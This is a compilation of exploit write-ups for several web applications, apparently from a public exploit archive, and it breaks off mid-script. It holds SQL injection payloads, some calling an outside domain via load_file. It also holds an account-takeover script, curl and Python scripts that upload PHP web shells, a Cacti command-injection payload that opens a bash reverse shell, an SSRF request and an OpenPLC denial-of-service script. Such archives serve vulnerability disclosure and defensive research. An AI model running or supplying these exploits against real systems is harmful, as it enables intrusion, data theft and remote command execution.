<pre><code>## Title: dawa-pharma-1.0-2022 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 10/12/2023<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The email parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'<br />was submitted in the email parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can get all the information for the clients<br />of this application from the server, and very sensitive information<br />for accessing the server by exploiting the vulnerability.<br /><br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```MySQL<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''<br />AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--<br />VRdC&password=mayurik&login=<br />---<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/10/dawa-pharma-10-2022-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over <br /># Date: 2023-12-03<br /># Exploit Author: OR4NG.M4N<br /># Category : webapps<br /># CVE : CVE-2023-38965<br /><br />Python p0c :<br /><br />import argparse<br />import requests<br />import time<br />parser = argparse.ArgumentParser(description='Send a POST request to the target server')<br />parser.add_argument('-url', help='URL of the target', required=True)<br />parser.add_argument('-user', help='Username', required=True)<br />parser.add_argument('-password', help='Password', required=True)<br />args = parser.parse_args()<br /><br /><br />url = args.url + '/classes/Users.php?f=save'<br /><br /><br />data = {<br /> 'id': '1',<br /> 'firstname': 'or4ng',<br /> 'middlename': '',<br /> 'lastname': 'Admin',<br /> 'username': args.user,<br /> 'password': args.password<br />}<br /><br />response = requests.post(url, data)<br />if b"1" in response.content:<br /> print("Exploit ..")<br /> time.sleep(1)<br /> print("User :" + args.user + "\nPassword :" + args.password)<br />else:<br /> print("Exploit Failed..")<br /><br /></code></pre>
<pre><code># Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE<br /># Date: 07.10.2023<br /># Exploit Author: Oğulcan Hami Gül<br /># Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code<br /># Version: 1.0<br /># Tested on: Windows 10<br /><br />## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.<br /><br />curl -i -s -k -X $'POST' \<br /> -H $'Host: 192.168.1.36' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: multipart/form-data; boundary=---------------------------11668063818537881393672984185' -H $'Origin: http://192.168.1.36' -H $'Connection: close' -H $'Referer: http://192.168.1.36/pms/users.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 787' \<br /> --data-binary $'-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"display_name\"\x0d\x0a\x0d\x0aCannn3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"user_name\"\x0d\x0a\x0d\x0aGull3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"password\"\x0d\x0a\x0d\x0acangul\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"profile_picture\"; filename=\"phps.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0a if(isset($_GET[\'cmd\']))\x0a {\x0a system($_GET[\'cmd\']);\x0a }\x0a?>\x0a\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"save_user\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11668063818537881393672984185--\x0d\x0a' \<br /> $'http://192.168.1.36/pms/users.php'<br /><br /><br />## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/user_images/ without any authentication.<br /><br />## With the request http://192.168.1.36/pms/user_images/1696703526phps.php?cmd=whoami the attacker can execute arbitrary command on the application server.<br /><br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Smart School 6.4.1 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 28/09/2023<br /># Vendor: QDocs - qdocs.net<br /># Vendor Homepage: https://smart-school.in/<br /># Software Link: https://demo.smart-school.in/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-5495<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /course/filterRecords/<br /><br />POST Parameter 'searchdata[0][title]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi<br /><br />searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]<br /><br />-------------------------------------------<br />POST /course/filterRecords/ HTTP/1.1<br /><br /><br />searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3<br /><br />-------------------------------------------<br /><br />searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]<br /><br /><br />Path: /course/filterRecords/<br /><br /><br />POST Parameter 'searchdata[0][title]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi<br />POST Parameter 'searchdata[1][title]' is vulnerable to SQLi<br />POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi<br />POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi<br /><br />---<br />Parameter: searchdata[0][title] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[0][searchfield] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[0][searchvalue] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[1][title] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[1][searchvalue] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z<br />---<br /><br /><br />-------------------------------------------<br />POST /course/filterRecords/ HTTP/1.1<br /><br /><br />searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]<br />-------------------------------------------<br /><br /><br /><br />Path: /online_admission<br /><br />---<br />Parameter: MULTIPART email ((custom) POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--<br />---<br /><br />POST Parameter 'email' is vulnerable to SQLi<br /><br />POST /online_admission HTTP/1.1<br /><br />-----------------------------320375734131102816923531485385<br />Content-Disposition: form-data; name="email"<br /><br />*[SQLi]<br />-----------------------------320375734131102816923531485385<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: gaatitrack-1.0-2023 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 08/31/2023<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The email parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+'<br />was submitted in the email parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can get all the information for the clients<br />of this application from the server, and very sensitive information<br />for accessing the server by exploiting the vulnerability.<br /><br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```MySQL<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+''<br />OR NOT 9478=9478-- PfLy&password=admin<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+''<br />OR (SELECT 9464 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT<br />(ELT(9464=9464,1))),0x7162626b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QTps&password=admin<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+''<br />AND (SELECT 4385 FROM (SELECT(SLEEP(15)))AHWF)-- CATW&password=admin<br />---<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/gaatitrack-1.0-2023)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/10/gaatitrack-10-2023-multiple-sqli.html)<br /><br />## Time spend:<br />01:10:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options<br /># Date: 2023-07-03<br /># Exploit Author: Antonio Francesco Sardella<br /># Vendor Homepage: https://www.cacti.net/<br /># Software Link: https://www.cacti.net/info/downloads<br /># Version: Cacti 1.2.24<br /># Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container<br /># CVE: CVE-2023-39362<br /># Category: WebApps<br /># Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp<br /># Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application<br /># Vulnerability discovered and reported by: Antonio Francesco Sardella<br /><br />=======================================================================================<br />Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)<br />=======================================================================================<br /><br />-----------------<br />Executive Summary<br />-----------------<br /><br />In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.<br /><br />-------<br />Exploit<br />-------<br /><br />Prerequisites:<br /> - The attacker is authenticated.<br /> - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".<br /> - A Device that supports SNMP can be used.<br /> - Net-SNMP Graphs can be used.<br /> - snmp module of PHP is not installed.<br /><br />Example of an exploit:<br /> - Go to "Console" > "Create" > "New Device".<br /> - Create a Device that supports SNMP version 1 or 2.<br /> - Ensure that the Device has Graphs with one or more templates of:<br /> - "Net-SNMP - Combined SCSI Disk Bytes"<br /> - "Net-SNMP - Combined SCSI Disk I/O"<br /> - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)<br /> - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:<br /> public\' ; touch /tmp/m3ssap0 ; \'<br /> - Click the "Create" button.<br /> - Check under /tmp the presence of the created file.<br /><br />To obtain a reverse shell, a payload like the following can be used.<br /><br /> public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'<br /><br />A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).<br /><br />----------<br />Root Cause<br />----------<br /><br />A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).<br /><br />----------<br />References<br />----------<br /><br /> - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp<br /> - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html<br /> - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application<br /><br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br /># Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability<br /># Date: 08/21/2023<br /># Exploit Author: 1337kid<br /># Vendor Homepage: https://boidcms.github.io/#/<br /># Software Link: https://boidcms.github.io/BoidCMS.zip<br /># Version: <= 2.0.0<br /># Tested on: Ubuntu<br /># CVE : CVE-2023-38836<br /><br />import requests<br />import re<br />import argparse<br /><br />parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')<br />parser.add_argument("-u", "--url", help="website url")<br />parser.add_argument("-l", "--user", help="admin username")<br />parser.add_argument("-p", "--passwd", help="admin password")<br />args = parser.parse_args()<br />base_url=args.url<br />user=args.user<br />passwd=args.passwd<br /><br />def showhelp():<br /> print(parser.print_help())<br /> exit()<br />if base_url == None: showhelp()<br />elif user == None: showhelp()<br />elif passwd == None: showhelp()<br /><br />with requests.Session() as s:<br /> req=s.get(f'{base_url}/admin')<br /> token=re.findall('[a-z0-9]{64}',req.text)<br /> form_login_data={<br /> "username":user,<br /> "password":passwd,<br /> "login":"Login",<br /> }<br /> form_login_data['token']=token<br /> s.post(f'{base_url}/admin',data=form_login_data)<br /> #=========== File upload to RCE<br /> req=s.get(f'{base_url}/admin?page=media')<br /> token=re.findall('[a-z0-9]{64}',req.text)<br /> form_upld_data={<br /> "token":token,<br /> "upload":"Upload"<br /> }<br /> #==== php shell<br /> php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']<br /> with open('shell.php','w') as f:<br /> f.writelines(php_code)<br /> #====<br /> file = {'file' : open('shell.php','rb')}<br /> s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)<br /> req=s.get(f'{base_url}/media/shell.php')<br /> if req.status_code == '404':<br /> print("Upload failed")<br /> exit()<br /> print(f'Shell uploaded to "{base_url}/media/shell.php"')<br /> while 1:<br /> cmd=input("cmd >> ")<br /> if cmd=='exit': exit()<br /> req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})<br /> print(req.text)<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF<br />Application: Webedition CMS<br />Version: v2.9.8.8 <br />Bugs: Blind SSRF<br />Technology: PHP<br />Vendor URL: https://www.webedition.org/<br />Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1<br />Date of found: 07.09.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />write https://youserver/test.xml to we_cmd[0] parameter<br /><br />poc request<br /><br />POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1<br />Host: localhost<br />Content-Length: 141<br />sec-ch-ua: <br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36<br />sec-ch-ua-platform: ""<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300<br />Connection: close<br /><br />we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: OpenPLC WebServer 3 - Denial of Service<br /># Date: 10.09.2023<br /># Exploit Author: Kai Feng<br /># Vendor Homepage: https://autonomylogic.com/<br /># Software Link: https://github.com/thiagoralves/OpenPLC_v3.git<br /># Version: Version 3 and 2<br /># Tested on: Ubuntu 20.04<br /><br /><br />import requests<br />import sys<br />import time<br />import optparse<br />import re<br /><br />parser = optparse.OptionParser()<br />parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")<br />parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")<br />parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")<br />parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")<br />parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")<br /><br />options, args = parser.parse_args()<br />if not options.url:<br /> print('[+] Remote Code Execution on OpenPLC_v3 WebServer')<br /> print('[+] Specify an url target')<br /> print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")<br /> exit()<br /><br />host = options.url<br />login = options.url + '/login' <br />upload_program = options.url + '/programs'<br />compile_program = options.url + '/compile-program?file=681871.st' <br />run_plc_server = options.url + '/start_plc'<br />user = options.user<br />password = options.passw<br />rev_ip = options.rip<br />rev_port = options.rport<br />x = requests.Session()<br /><br />def auth():<br /> print('[+] Remote Code Execution on OpenPLC_v3 WebServer')<br /> time.sleep(1)<br /> print('[+] Checking if host '+host+' is Up...')<br /> host_up = x.get(host)<br /> try:<br /> if host_up.status_code == 200:<br /> print('[+] Host Up! ...')<br /> except:<br /> print('[+] This host seems to be down :( ')<br /> sys.exit(0)<br /><br /> print('[+] Trying to authenticate with credentials '+user+':'+password+'') <br /> time.sleep(1) <br /> submit = {<br /> 'username': user,<br /> 'password': password<br /> }<br /> x.post(login, data=submit)<br /> response = x.get(upload_program)<br /> <br /> if len(response.text) > 30000 and response.status_code == 200:<br /> print('[+] Login success!')<br /> time.sleep(1)<br /> else:<br /> print('[x] Login failed :(')<br /> sys.exit(0) <br /><br />def injection():<br /> print('[+] PLC program uploading... ')<br /> upload_url = host + "/upload-program" <br /> upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}<br /> upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} <br /> upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"<br /> upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)<br /><br /> act_url = host + "/upload-program-action"<br /> act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}<br /> act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"<br /> upload_act = x.post(act_url, headers=act_headers, data=act_data)<br /> time.sleep(2)<br /><br />def connection():<br /> print('[+] add device...')<br /> inject_url = host + "/add-modbus-device"<br /> # inject_dash = host + "/dashboard"<br /> inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}<br /> inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}<br /> inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 